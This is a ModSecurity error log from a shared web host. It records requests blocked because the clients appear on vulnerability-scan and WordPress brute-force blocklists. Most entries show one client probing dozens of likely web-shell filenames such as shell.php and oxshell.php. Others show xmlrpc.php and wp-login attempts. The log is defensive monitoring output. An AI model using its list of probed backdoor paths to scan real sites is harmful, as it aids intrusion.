[Tue May 26 16:11:53.484991 2026] [security2:error] [pid 773493:tid 773669] [client 20.196.127.68:17525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/mar.php"] [unique_id "ahV48Zgy-Vk4jSdqTCRVNgAAALM"]
[Tue May 26 16:11:53.546546 2026] [security2:error] [pid 773493:tid 773628] [client 103.44.52.196:40550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV48Zgy-Vk4jSdqTCRVNwAAAIo"]
[Tue May 26 16:11:53.546677 2026] [security2:error] [pid 773493:tid 773628] [client 103.44.52.196:40550] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV48Zgy-Vk4jSdqTCRVNwAAAIo"]
[Tue May 26 16:11:54.084378 2026] [security2:error] [pid 773493:tid 773707] [client 20.196.127.68:16946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/my1.php"] [unique_id "ahV48pgy-Vk4jSdqTCRVRQAAANk"]
[Tue May 26 16:11:54.726569 2026] [security2:error] [pid 773493:tid 773659] [client 20.196.127.68:13318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/mm.php"] [unique_id "ahV48pgy-Vk4jSdqTCRVUQAAAKk"]
[Tue May 26 16:11:55.140363 2026] [security2:error] [pid 773493:tid 773698] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV48pgy-Vk4jSdqTCRVUAAAANA"]
[Tue May 26 16:11:55.370121 2026] [security2:error] [pid 773493:tid 773645] [client 20.196.127.68:13503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/network.php"] [unique_id "ahV485gy-Vk4jSdqTCRVWgAAAJs"]
[Tue May 26 16:11:56.041546 2026] [security2:error] [pid 773493:tid 773671] [client 20.196.127.68:17489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/new.php"] [unique_id "ahV49Jgy-Vk4jSdqTCRVYwAAALU"]
[Tue May 26 16:11:56.295158 2026] [security2:error] [pid 773493:tid 773654] [client 173.239.240.34:61073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahV49Jgy-Vk4jSdqTCRVZAAAAKQ"]
[Tue May 26 16:11:56.674906 2026] [security2:error] [pid 773493:tid 773666] [client 20.196.127.68:14553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/0x.php"] [unique_id "ahV49Jgy-Vk4jSdqTCRVcQAAALA"]
[Tue May 26 16:11:57.334645 2026] [security2:error] [pid 773493:tid 773636] [client 20.196.127.68:13924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/0.php"] [unique_id "ahV49Zgy-Vk4jSdqTCRVgQAAAJI"]
[Tue May 26 16:11:57.883406 2026] [security2:error] [pid 773493:tid 773687] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV49Zgy-Vk4jSdqTCRVhwAAAMU"]
[Tue May 26 16:11:57.968384 2026] [security2:error] [pid 773493:tid 773651] [client 20.196.127.68:13892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/oxshell.php"] [unique_id "ahV49Zgy-Vk4jSdqTCRVjgAAAKE"]
[Tue May 26 16:11:58.550721 2026] [security2:error] [pid 773493:tid 773734] [client 20.196.127.68:17511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV49pgy-Vk4jSdqTCRVmgAAAPQ"]
[Tue May 26 16:11:59.153836 2026] [security2:error] [pid 773493:tid 773660] [client 20.196.127.68:17479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/p.php"] [unique_id "ahV495gy-Vk4jSdqTCRVqwAAAKo"]
[Tue May 26 16:11:59.247743 2026] [security2:error] [pid 773493:tid 773662] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV49pgy-Vk4jSdqTCRVoQAAAKw"]
[Tue May 26 16:11:59.815656 2026] [security2:error] [pid 773493:tid 773636] [client 20.196.127.68:13358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/php.php"] [unique_id "ahV495gy-Vk4jSdqTCRVvwAAAJI"]
[Tue May 26 16:12:00.199648 2026] [security2:error] [pid 773493:tid 773631] [client 172.226.44.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV4-Jgy-Vk4jSdqTCRVxQAAAI0"]
[Tue May 26 16:12:00.399318 2026] [security2:error] [pid 773493:tid 773651] [client 20.196.127.68:13330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/past.php"] [unique_id "ahV4-Jgy-Vk4jSdqTCRV0AAAAKE"]
[Tue May 26 16:12:00.823337 2026] [security2:error] [pid 773493:tid 773645] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4-Jgy-Vk4jSdqTCRV0wAAAJs"]
[Tue May 26 16:12:01.026107 2026] [security2:error] [pid 773493:tid 773713] [client 20.196.127.68:13899] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/root.php"] [unique_id "ahV4-Zgy-Vk4jSdqTCRV4AAAAN8"]
[Tue May 26 16:12:01.452923 2026] [security2:error] [pid 773493:tid 773692] [client 106.219.85.83:4620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4-Zgy-Vk4jSdqTCRV6QAAAMo"]
[Tue May 26 16:12:01.453022 2026] [security2:error] [pid 773493:tid 773692] [client 106.219.85.83:4620] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV4-Zgy-Vk4jSdqTCRV6QAAAMo"]
[Tue May 26 16:12:01.617192 2026] [security2:error] [pid 773493:tid 773654] [client 20.196.127.68:2960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/r.php"] [unique_id "ahV4-Zgy-Vk4jSdqTCRV8AAAAKQ"]
[Tue May 26 16:12:02.164327 2026] [security2:error] [pid 773493:tid 773523] [remote 95.216.117.13:53216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahV4-Zgy-Vk4jSdqTCRV8QAArh0"]
[Tue May 26 16:12:02.234182 2026] [security2:error] [pid 773493:tid 773672] [client 20.196.127.68:17524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahV4-pgy-Vk4jSdqTCRV_AAAALY"]
[Tue May 26 16:12:02.815298 2026] [security2:error] [pid 773493:tid 773695] [client 20.196.127.68:13367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ss.php"] [unique_id "ahV4-pgy-Vk4jSdqTCRWBgAAAM0"]
[Tue May 26 16:12:03.449269 2026] [security2:error] [pid 773493:tid 773735] [client 20.196.127.68:13436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/sts.php"] [unique_id "ahV4-5gy-Vk4jSdqTCRWFQAAAPU"]
[Tue May 26 16:12:03.507139 2026] [security2:error] [pid 773493:tid 773645] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4-5gy-Vk4jSdqTCRWDwAAAJs"]
[Tue May 26 16:12:04.005464 2026] [security2:error] [pid 773493:tid 773640] [client 103.44.52.196:60470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4_Jgy-Vk4jSdqTCRWJAAAAJY"]
[Tue May 26 16:12:04.005669 2026] [security2:error] [pid 773493:tid 773640] [client 103.44.52.196:60470] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV4_Jgy-Vk4jSdqTCRWJAAAAJY"]
[Tue May 26 16:12:04.074426 2026] [security2:error] [pid 773493:tid 773665] [client 20.196.127.68:16138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/shell.php"] [unique_id "ahV4_Jgy-Vk4jSdqTCRWJQAAAK8"]
[Tue May 26 16:12:04.656607 2026] [security2:error] [pid 773493:tid 773623] [client 20.196.127.68:13381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/setup-config.php"] [unique_id "ahV4_Jgy-Vk4jSdqTCRWLAAAAIU"]
[Tue May 26 16:12:05.235775 2026] [security2:error] [pid 773493:tid 773647] [client 20.196.127.68:13673] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahV4_Zgy-Vk4jSdqTCRWPAAAAJ0"]
[Tue May 26 16:12:05.548298 2026] [security2:error] [pid 773493:tid 773685] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4_Zgy-Vk4jSdqTCRWOwAAAMM"]
[Tue May 26 16:12:05.835587 2026] [security2:error] [pid 773493:tid 773658] [client 20.196.127.68:13439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/up.php"] [unique_id "ahV4_Zgy-Vk4jSdqTCRWRgAAAKg"]
[Tue May 26 16:12:06.495706 2026] [security2:error] [pid 773493:tid 773735] [client 20.196.127.68:13430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ultra.php"] [unique_id "ahV4_pgy-Vk4jSdqTCRWUwAAAPU"]
[Tue May 26 16:12:07.097468 2026] [security2:error] [pid 773493:tid 773689] [client 20.196.127.68:2479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/vv.php"] [unique_id "ahV4_5gy-Vk4jSdqTCRWYQAAAMc"]
[Tue May 26 16:12:07.111600 2026] [security2:error] [pid 773493:tid 773643] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV4_pgy-Vk4jSdqTCRWVgAAAJk"]
[Tue May 26 16:12:07.677751 2026] [security2:error] [pid 773493:tid 773661] [client 20.196.127.68:13416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/V5.php"] [unique_id "ahV4_5gy-Vk4jSdqTCRWcwAAAKs"]
[Tue May 26 16:12:08.259755 2026] [security2:error] [pid 773493:tid 773658] [client 20.196.127.68:13354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp-user.php"] [unique_id "ahV5AJgy-Vk4jSdqTCRWgwAAAKg"]
[Tue May 26 16:12:08.925259 2026] [security2:error] [pid 773493:tid 773694] [client 20.196.127.68:13420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp-blog.php"] [unique_id "ahV5AJgy-Vk4jSdqTCRWkwAAAMw"]
[Tue May 26 16:12:09.525998 2026] [security2:error] [pid 773493:tid 773746] [client 20.196.127.68:13351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV5AZgy-Vk4jSdqTCRWogAAAQA"]
[Tue May 26 16:12:09.557032 2026] [security2:error] [pid 773493:tid 773640] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5AZgy-Vk4jSdqTCRWmgAAAJY"]
[Tue May 26 16:12:10.163481 2026] [security2:error] [pid 773493:tid 773659] [client 20.196.127.68:13384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/worksec.php"] [unique_id "ahV5Apgy-Vk4jSdqTCRWrAAAAKk"]
[Tue May 26 16:12:10.779535 2026] [security2:error] [pid 773493:tid 773699] [client 20.196.127.68:17505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp-themes.php"] [unique_id "ahV5Apgy-Vk4jSdqTCRWuQAAANE"]
[Tue May 26 16:12:11.017924 2026] [security2:error] [pid 773493:tid 773736] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Apgy-Vk4jSdqTCRWtQAAAPY"]
[Tue May 26 16:12:11.440238 2026] [security2:error] [pid 773493:tid 773627] [client 20.196.127.68:16131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp-signin.php"] [unique_id "ahV5A5gy-Vk4jSdqTCRWxgAAAIk"]
[Tue May 26 16:12:12.091775 2026] [security2:error] [pid 773493:tid 773689] [client 20.196.127.68:13334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wp-blog-header.php"] [unique_id "ahV5BJgy-Vk4jSdqTCRW0gAAAMc"]
[Tue May 26 16:12:12.371166 2026] [security2:error] [pid 773493:tid 773682] [client 106.219.85.83:1444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5BJgy-Vk4jSdqTCRW0wAAAMA"]
[Tue May 26 16:12:12.371361 2026] [security2:error] [pid 773493:tid 773682] [client 106.219.85.83:1444] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5BJgy-Vk4jSdqTCRW0wAAAMA"]
[Tue May 26 16:12:12.949668 2026] [security2:error] [pid 773493:tid 773674] [client 20.196.127.68:13406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahV5BJgy-Vk4jSdqTCRW5wAAALg"]
[Tue May 26 16:12:13.309073 2026] [security2:error] [pid 773493:tid 773650] [client 123.16.208.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5BJgy-Vk4jSdqTCRW4QAAAKA"]
[Tue May 26 16:12:13.566791 2026] [security2:error] [pid 773493:tid 773713] [client 20.196.127.68:13651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/wsa.php"] [unique_id "ahV5BZgy-Vk4jSdqTCRW-QAAAN8"]
[Tue May 26 16:12:13.787560 2026] [security2:error] [pid 773493:tid 773634] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5BZgy-Vk4jSdqTCRW9QAAAJA"]
[Tue May 26 16:12:14.249068 2026] [security2:error] [pid 773493:tid 773682] [client 20.196.127.68:13999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahV5Bpgy-Vk4jSdqTCRXEQAAAMA"]
[Tue May 26 16:12:14.589112 2026] [security2:error] [pid 773493:tid 773673] [client 103.44.52.196:43372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Bpgy-Vk4jSdqTCRXIQAAALc"]
[Tue May 26 16:12:14.589258 2026] [security2:error] [pid 773493:tid 773673] [client 103.44.52.196:43372] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Bpgy-Vk4jSdqTCRXIQAAALc"]
[Tue May 26 16:12:14.911101 2026] [security2:error] [pid 773493:tid 773659] [client 20.196.127.68:13987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.businessapac.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV5Bpgy-Vk4jSdqTCRXLAAAAKk"]
[Tue May 26 16:12:15.218148 2026] [security2:error] [pid 773493:tid 773630] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Bpgy-Vk4jSdqTCRXJwAAAIw"]
